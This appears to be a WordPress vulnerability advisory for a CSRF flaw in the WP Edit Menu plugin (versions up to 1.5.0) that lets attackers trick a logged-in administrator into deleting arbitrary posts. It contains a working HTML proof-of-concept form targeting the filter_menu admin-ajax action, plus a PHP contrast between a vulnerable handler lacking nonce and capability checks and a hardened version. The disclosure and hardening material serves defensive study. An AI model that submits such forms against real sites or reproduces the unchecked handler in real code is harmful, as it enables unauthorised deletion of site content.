wpexploit | Johannes Gangsø | WPEX-ID:07757D1E-39AD-4199-BC7A-ECB821DFC996
History: Aug 01, 2022 - 12:00 a.m.

WP Edit Menu <= 1.5.0 - Arbitrary Post Deletion via CSRF

Tags: wordpress, edit menu, csrf, arbitrary post deletion

EPSS: 0.001 (percentile 25.9%)

The plugin does not have a CSRF check (nonce verification) in one of its AJAX actions, which could allow attackers to make a logged-in admin delete arbitrary posts/pages from the blog via a CSRF attack. The attacker needs no account on the site: the cross-site form below is submitted by the victim's browser with the victim's WordPress session cookie, and the `filter_menu` action deletes the post/page IDs passed in `val[]` (post ID 1 in the proof of concept).

<html>
  <body>
    <!-- Target: the plugin's filter_menu admin-ajax action (replace example.com with the victim site) -->
    <form action="https://example.com/wp-admin/admin-ajax.php?action=filter_menu" method="POST">
      <!-- val[] carries the ID of the post/page to delete; here post ID 1 -->
      <input type="hidden" name="val[]" value="1" />
      <!-- Submitted by a logged-in administrator (by click or an auto-submitting script), the request deletes the post -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
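The vulnerable pattern the proof of concept relies on, shown next to its hardened form, as an added illustration that is not WP Edit Menu's own code. Only the `filter_menu` action name and the `val[]` parameter are taken from the PoC above; the function names, the `wp_edit_menu_` prefix, the nonce action string and the script handle are assumptions made for the example.

```php
<?php
// Added illustration, not the plugin's source. `filter_menu` and `val[]`
// come from the advisory's PoC; all other names are assumed.

// --- Vulnerable pattern (not registered below): deletes whatever IDs the
// request carries. A cross-site form submission still sends the victim's
// login cookie, so this runs with the administrator's privileges.
function vulnerable_filter_menu() {
    $ids = isset( $_POST['val'] ) ? (array) $_POST['val'] : array();
    foreach ( $ids as $id ) {
        wp_delete_post( (int) $id, true ); // no nonce, no capability check
    }
    wp_die();
}

// --- Hardened handler: nonce check plus a per-post capability check.
function wp_edit_menu_filter_menu_fixed() {
    // 1. CSRF: reject requests without a valid nonce. A page on another
    //    origin cannot read the nonce, so a forged form fails here.
    //    check_ajax_referer() dies with HTTP 403 when the check fails.
    check_ajax_referer( 'wp_edit_menu_filter_menu', 'nonce' );

    $ids     = isset( $_POST['val'] ) ? array_map( 'absint', (array) $_POST['val'] ) : array();
    $deleted = array();
    foreach ( $ids as $id ) {
        // 2. Authorization is separate from CSRF protection: even with a
        //    valid nonce, the caller must be allowed to delete this post.
        if ( $id > 0 && current_user_can( 'delete_post', $id ) ) {
            if ( wp_delete_post( $id, true ) ) {
                $deleted[] = $id;
            }
        }
    }
    wp_send_json_success( array( 'deleted' => $deleted ) );
}
// Only the wp_ajax_ hook is registered (no wp_ajax_nopriv_), so the action
// is reachable by logged-in users only, as in the advisory.
add_action( 'wp_ajax_filter_menu', 'wp_edit_menu_filter_menu_fixed' );

// --- Hand the nonce to the plugin's own admin script, which must send it
// as the `nonce` POST field alongside action=filter_menu and val[].
function wp_edit_menu_enqueue_admin_script() {
    wp_enqueue_script( 'wp-edit-menu-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'wp-edit-menu-admin', 'wpEditMenu', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'wp_edit_menu_filter_menu' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'wp_edit_menu_enqueue_admin_script' );
```

With the fix in place, the PoC form above fails at `check_ajax_referer()` before any post is touched, and a request that does carry a valid nonce still cannot delete a post the current user is not allowed to delete.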
